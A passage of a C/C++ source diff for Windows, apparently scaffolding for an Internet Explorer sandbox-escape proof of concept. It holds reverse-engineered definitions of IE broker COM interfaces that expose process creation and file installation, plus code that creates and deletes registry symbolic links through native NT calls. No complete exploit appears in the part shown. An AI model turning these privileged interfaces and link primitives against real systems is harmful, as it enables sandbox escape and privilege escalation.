|
||||
|
||||
#include <vector>
|
||||
|
||||
bstr_t GetTemp(LPCWSTR name);
|
||||
bstr_t GetTempPath();
|
||||
bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len);
|
||||
std::vector<unsigned char> ReadFileToMem(LPCWSTR name);
|
||||
void DebugPrintf(LPCSTR lpFormat, ...);
|
||||
bstr_t GetUserSid();
|
||||
void DisableImpersonation(IUnknown* pUnk);
|
||||
void SetCloaking(IUnknown* pUnk);
|
||||
IIEUserBrokerPtr CreateBroker();
|
||||
IShdocvwBroker* CreateSHDocVw();
|
||||
bstr_t GetWindowsSystemDirectory();
|
||||
bstr_t GetExecutableFileName(HMODULE hModule);
|
||||
extern "C" int DeleteLink(LPCWSTR par_src);
|
||||
extern "C" int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile);
|
||||
bstr_t GetSessionPath();
|
||||
LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString);
|
||||
LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d);
|
|
@ -0,0 +1,258 @@
|
|||
#pragma once
|
||||
|
||||
#include <tchar.h>
|
||||
#include <Windows.h>
|
||||
#include <comdef.h>
|
||||
#include <Shtypes.h>
|
||||
#include <DocObj.h>
|
||||
|
||||
struct __declspec(uuid("1AC7516E-E6BB-4A69-B63F-E841904DC5A6")) IIEUserBroker : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE Initialize(HWND *, LPCWSTR, LPDWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CreateProcessW(DWORD pid, LPWSTR appName, LPWSTR cmdline, DWORD, DWORD, LPCSTR, WORD*, /* _BROKER_STARTUPINFOW*/ void *, /* _BROKER_PROCESS_INFORMATION */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WinExec(DWORD pid, LPCSTR, DWORD, DWORD*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCreateKnownObject(_GUID const &, _GUID const &, IUnknown * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstance() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstanceEx(DWORD pid, _GUID const &, IUnknown *, DWORD, _COSERVERINFO *, DWORD, /* tagBROKER_MULTI_QI */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoGetClassObject(DWORD pid, _GUID const &, DWORD, _COSERVERINFO *, _GUID const &, IUnknown * *) = 0;
|
||||
};
|
||||
|
||||
struct __declspec(uuid("BDB57FF2-79B9-4205-9447-F5FE85F37312")) CIEAxInstallBroker
|
||||
{
|
||||
};
|
||||
|
||||
struct __declspec(uuid("B2103BDB-B79E-4474-8424-4363161118D5")) IIEAxInstallBrokerBroker : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerGetAxInstallBroker(REFCLSID rclsid, REFIID riid, int unknown, int type, HWND, IUnknown** ppv) = 0;
|
||||
};
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIEAxInstallBrokerBroker, __uuidof(IIEAxInstallBrokerBroker));
|
||||
|
||||
struct ERF
|
||||
{
|
||||
//+0x000 erfOper : Int4B
|
||||
// + 0x004 erfType : Int4B
|
||||
// + 0x008 fError : Int4B
|
||||
|
||||
int erfOper;
|
||||
int erfType;
|
||||
int fError;
|
||||
};
|
||||
|
||||
struct FNAME
|
||||
{
|
||||
/*+0x000 pszFilename : Ptr32 Char
|
||||
+ 0x004 pNextName : Ptr32 sFNAME
|
||||
+ 0x008 status : Uint4B*/
|
||||
|
||||
char* pszFilenane;
|
||||
FNAME* pNextName;
|
||||
UINT status;
|
||||
};
|
||||
|
||||
struct SESSION
|
||||
{
|
||||
/*+0x000 cbCabSize : Uint4B
|
||||
+ 0x004 erf : ERF
|
||||
+ 0x010 pFileList : Ptr32 sFNAME
|
||||
+ 0x014 cFiles : Uint4B
|
||||
+ 0x018 flags : Uint4B
|
||||
+ 0x01c achLocation : [260] Char
|
||||
+ 0x120 achFile : [260] Char
|
||||
+ 0x224 achCabPath : [260] Char
|
||||
+ 0x328 pFilesToExtract : Ptr32 sFNAME*/
|
||||
|
||||
UINT cbCabSize;
|
||||
ERF erf;
|
||||
FNAME* pFileList;
|
||||
UINT cFiles;
|
||||
UINT flags;
|
||||
char achLocation[260];
|
||||
char achFile[260];
|
||||
char achCabPath[260];
|
||||
FNAME* pFilesToExtract;
|
||||
};
|
||||
|
||||
struct __declspec(uuid("BC0EC710-A3ED-4F99-B14F-5FD59FDACEA3")) IIeAxiInstaller2 : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE VerifyFile(BSTR, HWND__ *, BSTR, BSTR, BSTR, unsigned int, unsigned int, _GUID const &, BSTR*, unsigned int *, unsigned char **) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RunSetupCommand(BSTR, HWND__ *, BSTR, BSTR, BSTR, BSTR, unsigned int, unsigned int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InstallFile(BSTR sessionGuid, HWND__ *, BSTR sourcePath, BSTR sourceFile, BSTR destPath, BSTR destFile, unsigned int unk) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterExeFile(BSTR sessionGuid, BSTR cmdline, int unk, _PROCESS_INFORMATION *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterDllFile(BSTR, BSTR, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InstallCatalogFile(BSTR, BSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateLanguageCheck(BSTR, unsigned short const *, _FILETIME) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateModuleUsage(BSTR, char const *, char const *, char const *, char const *, unsigned int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EnumerateFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ExtractFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RemoveExtractedFilesAndDirs(BSTR, SESSION *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CreateExtensionsManager(BSTR, _GUID const &, IUnknown * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterDllFile2(BSTR, BSTR, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit2(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, int *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE UpdateAllowedDomainsList(_GUID const &, BSTR, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteExtractedFile(char const *) = 0;
|
||||
};
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIeAxiInstaller2, __uuidof(IIeAxiInstaller2));
|
||||
|
||||
struct __declspec(uuid("9AEA8A59-E0C9-40F1-87DD-757061D56177")) IIeAxiAdminInstaller : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE InitializeAdminInstaller(BSTR, BSTR, BSTR*) = 0;
|
||||
};
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIeAxiAdminInstaller, __uuidof(IIeAxiAdminInstaller));
|
||||
|
||||
struct __declspec(uuid("A4AAAE00-22E5-4742-ABB7-379D9493A3B7")) IShdocvwBroker : IUnknown
|
||||
{
|
||||
virtual HRESULT STDMETHODCALLTYPE RedirectUrl(WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RedirectShortcut(WORD const *, WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RedirectUrlWithBindInfo(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NavigateUrlInNewTabInstance(/* _BROKER_BIND_INFO */ void *, /*_BROKER_REDIRECT_DETAIL */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptions(HWND *, WORD const *, WORD const *, long, ITEMIDLIST_ABSOLUTE * *, DWORD, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsZones(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsLanguages(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowPopupManager(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowCachesAndDatabases(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ConfigurePopupExemption(HWND *, int, WORD const *, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ConfigurePopupMgr(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RemoveFirstHomePage(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetHomePage(HWND *, long, ITEMIDLIST_ABSOLUTE * *, long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RemoveHomePage(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE FixInternetSecurity(HWND *, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowManageAddons(HWND *, DWORD, _GUID *, DWORD, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CacheExtFileVersion(_GUID const &, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAxApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SendLink(ITEMIDLIST_ABSOLUTE const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SendPage(HWND *, IDataObject *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NewMessage(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ReadMail(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetAsBackground(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSaveBrowseFile(HWND *, WORD const *, WORD const *, int, int, WORD * *, DWORD *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveAsComplete(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveAsFile(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE StartImportExportWizard(int, HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EditWith(HWND *, DWORD, HANDLE, DWORD, LPCWSTR, LPCWSTR, LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSaveImage(HWND *, WORD const *, DWORD, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveImage(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CreateShortcut(/* _internet_shortcut_params */ void*, int, HWND *, WORD *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSynchronizeUI(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE OpenFolderAndSelectItem(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoGetOpenFileNameDialog(/* _SOpenDlg */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoGetLocationPlatformConsent(HWND *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowSaveFileName(HWND *, WORD const *, WORD const *, WORD const *, WORD const *, DWORD, WORD *, DWORD, WORD const *, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SaveFile(HWND *, DWORD, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE VerifyTrustAndExecute(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFeedByUrl(WORD const *, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerAddToFavoritesEx(HWND *, ITEMIDLIST_ABSOLUTE const *, WORD const *, DWORD, IOleCommandTarget *, WORD *, DWORD, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE Subscribe(HWND *, WORD const *, WORD const *, int, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MarkAllItemsRead(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MarkItemsRead(WORD const *, DWORD *, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE Properties(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteFeedItem(HWND *, WORD const *, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteFeed(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DeleteFolder(HWND *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE Refresh(WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MoveFeed(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MoveFeedFolder(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RenameFeed(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RenameFeedFolder(HWND *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NewFeedFolder(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE FeedRefreshAll(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowFeedAuthDialog(HWND *, WORD const *, /* FEEDTASKS_AUTHTYPE */ DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAddSearchProvider(HWND *, WORD const *, WORD const *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InitHKCUSearchScopesRegKey(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoShowDeleteBrowsingHistoryDialog(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE StartAutoProxyDetection(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EditAntiPhishingOptinSetting(HWND *, DWORD, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowMyPictures(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ChangeIntranetSettings(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE FixProtectedModeSettings(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAddService(HWND *, WORD const *, WORD const *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAddWebFilter(HWND *, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoBrowserRegister() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoBrowserRevoke(long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoOnNavigate(long, VARIANT *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE AddDesktopComponent(WORD *, WORD *, VARIANT *, VARIANT *, VARIANT *, VARIANT *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoOnCreated(long, IUnknown *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetShellWindows(IUnknown * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CustomizeSettings(short, short, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE OnFocus(int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsProtectedModeUrl(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoDiagnoseConnectionProblems(HWND *, WORD *, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE PerformDoDragDrop(HWND *, /* IEDataObjectWrapper */ void *, /* IEDropSourceWrapper */ void *, DWORD, DWORD, DWORD *, long *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE TurnOnFeedSyncEngine(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE InternetSetPerSiteCookieDecisionW(WORD const *, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetAttachmentUserOverride(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WriteClassesOfCategory(_GUID const &, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerSetFocus(DWORD, HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconA(DWORD, /* _BROKER_NOTIFYICONDATAA */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerShellNotifyIconW(DWORD, /* _BROKER_NOTIFYICONDATAW */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DisplayVirtualizedFolder(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerSetWindowPos(HWND *, HWND *, int, int, int, int, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WriteUntrustedControlDetails(_GUID const &, WORD const *, WORD const *, DWORD, BYTE *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetComponentDeclined(char const *, char const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoShowPrintDialog(/* _BROKER_PRINTDLG */ void*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE NavigateHomePages(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowAxDomainApprovalDlg(HWND *, _GUID const &, int, WORD const *, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ActivateExtensionFromCLSID(HWND *, WORD const *, DWORD, DWORD, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateNewIEWindow(DWORD, _GUID const &, void * *, int, DWORD, int, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BeginFakeModalityForwardingToTab() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerEnableWindow(int, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EndFakeModalityForwardingToTab(HWND *, long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CloseOldTabIfFailed(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EnableSuggestedSites(HWND *, int) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetProgressValue(HWND *, DWORD, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerStartNewIESession(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CompatDetachInputQueue(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CompatAttachInputQueue(void) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SetToggleKeys(DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RepositionInfrontIE(HWND *, int, int, int, int, DWORD) = 0;
|
||||
//virtual HRESULT STDMETHODCALLTYPE ReportShipAssert(DWORD, DWORD, DWORD, WORD const *, WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowOpenSafeOpenDialog(HWND *, /* _BROKER_SAFEOPENDLGPARAM */ void *, DWORD *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerAddSiteToStart(HWND *, WORD *, WORD const *, long, DWORD) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SiteModeAddThumbnailButton(DWORD *, HWND *, WORD *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE SiteModeAddButtonStyle(int *, HWND *, DWORD, WORD *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsSiteModeFirstRun(int, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsImmersiveSiteModeFirstRun(int, WORD const *, WORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetImmersivePinnedState(DWORD, int, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerDoSiteModeDragDrop(DWORD, long *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE EnterUILock(long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE LeaveUILock(long) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialAdd(/* _IECREDENTIAL */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialGet(WORD const *, WORD const *, /*_IECREDENTIAL */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialFindAllByUrl(WORD const *, DWORD *, /* _IECREDENTIAL */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE CredentialRemove(WORD const *, WORD const *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowOpenFile(HWND *, DWORD, DWORD, WORD *, WORD *, WORD const *, WORD const *, WORD const *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowImmersiveOpenFilePicker(HWND *, int, WORD const *, IUnknown * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RegisterFileDragDrop(HWND *, DWORD, unsigned char *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE RevokeFileDragDrop(HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropA(HWND *, DWORD, char * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFileTokensForDragDropW(HWND *, DWORD, WORD * *, /* _OPEN_FILE_RESULT */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowEPMCompatDocHostConsent(HWND *, WORD const *, WORD const *, int *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetModuleInfoFromSignature(WORD const *, WORD * *, DWORD, WORD * *, WORD * *, WORD * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShellExecWithActivationHandler(HWND *, LPCWSTR, LPCWSTR, int, /* _MSLAUNCH_HANDLER_STATUS */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShellExecFolderUri(LPCWSTR) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ShowIMMessageDialog(HWND *, WORD const *, WORD const *, /* _IM_BUTTON_LABEL_ID */ void *, DWORD, DWORD, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFileHandle(HWND *, BSTR filename, BYTE * hash, DWORD hashlen, HANDLE*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MOTWCreateFileW(DWORD dwProcessId, BSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, int dwOpenMode, DWORD dwFlagsAndAttributes, ULONGLONG* h, DWORD *error) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MOTWFindFileW() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE MOTWGetFileDataW() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE WinRTInitializeWithWindow(IUnknown *, HWND *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE DoProvisionNetworks(HWND *, WORD const *, DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetAccessibilityStylesheet(DWORD, unsigned __int64 *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetAppCacheUsage(WORD const *, unsigned __int64 *, unsigned __int64 *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE HiddenTabRequest(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* _HIDDENTAB_REQUEST_INFO */ void *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetMaxCpuSpeed(DWORD *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetProofOfPossessionTokensForUrl(WORD const *, DWORD *, /* _IEProofOfPossessionToken */ void * *) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetLoginUrl(LPWSTR*) = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE ScheduleDeleteEncryptedMediaData() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE IsDeleteEncryptedMediaDataPending() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE GetFrameAppDataPathA() = 0;
|
||||
virtual HRESULT STDMETHODCALLTYPE BrokerHandlePrivateNetworkFailure() = 0;
|
||||
|
||||
};
|
||||
|
||||
|
||||
_COM_SMARTPTR_TYPEDEF(IIEUserBroker, __uuidof(IIEUserBroker));
|
||||
_COM_SMARTPTR_TYPEDEF(IShdocvwBroker, __uuidof(IShdocvwBroker));
|
|
@ -0,0 +1,161 @@
|
|||
/*--------------------------------------------------------------------
|
||||
REGLN - Manage Windows Rregistry Links V20R0
|
||||
======================================================================
|
||||
Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
|
||||
|
||||
The following Copyrights apply:
|
||||
|
||||
Copyright (c) 1998-2005 by Antoni Sawicki <as@ntinternals.net>
|
||||
Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
|
||||
Copyright (c) 1998 by Mark Russinovich <mark@sysinternals.com>
|
||||
|
||||
License:
|
||||
|
||||
This software is distributed under the terms and conditions of
|
||||
GPL - GNU General Public License. The software is provided AS
|
||||
IS and ABSOLUTELY NO WARRANTY IS GIVEN. The author takes no
|
||||
responsibility for any damages or consequences of usage of this
|
||||
software. For more information, please read the attached GPL.TXT.
|
||||
|
||||
--------------------------------------------------------------------*/
|
||||
|
||||
#define _CRT_SECURE_NO_WARNINGS
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <wchar.h>
|
||||
#include "regln.h"
|
||||
#include "Utils.h"
|
||||
|
||||
|
||||
int checkargs(int argc, char *argv[]);
|
||||
char *win2ntapi(char *win, int len);
|
||||
int ntapi_init(void);
|
||||
int usage(void);
|
||||
|
||||
static fNtCreateKey NtCreateKey;
|
||||
static fNtDeleteKey NtDeleteKey;
|
||||
static fNtSetValueKey NtSetValueKey;
|
||||
|
||||
int DeleteLink(LPCWSTR par_src)
|
||||
{
|
||||
DWORD disposition, status;
|
||||
HANDLE hdl_nt_keyhandle;
|
||||
UNICODE_STRING nt_keyname;
|
||||
OBJECT_ATTRIBUTES nt_object_attributes;
|
||||
|
||||
ntapi_init();
|
||||
|
||||
nt_keyname.Buffer = par_src;
|
||||
nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
|
||||
|
||||
nt_object_attributes.ObjectName = &nt_keyname;
|
||||
nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE | REG_OPTION_OPEN_LINK_ATTR;
|
||||
nt_object_attributes.RootDirectory = NULL; //
|
||||
nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
|
||||
nt_object_attributes.SecurityQualityOfService = NULL; //
|
||||
nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
|
||||
|
||||
// open link
|
||||
status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE, &disposition);
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: %ls opened successfully.\n", par_src);
|
||||
|
||||
// delete
|
||||
status = NtDeleteKey(hdl_nt_keyhandle);
|
||||
|
||||
if (status == 0) {
|
||||
DebugPrintf("DEBUG: %ls deleted successfully.\n", par_src);
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link deletion failed. [Step 2] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
else {
|
||||
DebugPrintf("ERROR: Link deletion failed. [Step 1] [Error %08X]\n", status);
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
};
|
||||
|
||||
int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile)
|
||||
{
|
||||
DWORD disposition, status;
|
||||
HANDLE hdl_nt_keyhandle;
|
||||
UNICODE_STRING nt_keyname, nt_valuename;
|
||||
OBJECT_ATTRIBUTES nt_object_attributes;
|
||||
|
||||
ntapi_init();
|
||||
|
||||
nt_keyname.Buffer = par_src;
|
||||
nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
|
||||
|
||||
nt_object_attributes.ObjectName = &nt_keyname;
|
||||
nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE;
|
||||
nt_object_attributes.RootDirectory = NULL; //
|
||||
nt_object_attributes.SecurityDescriptor = NULL; // unused for this object type
|
||||
nt_object_attributes.SecurityQualityOfService = NULL; //
|
